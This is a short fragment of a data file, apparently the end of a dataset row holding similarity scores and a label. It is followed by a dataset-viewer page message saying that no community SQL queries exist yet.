"0.5452624",
"0.5452624",
"0.5448535",
"0.54418135",
"0.54411495"
] | 0.73344773 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.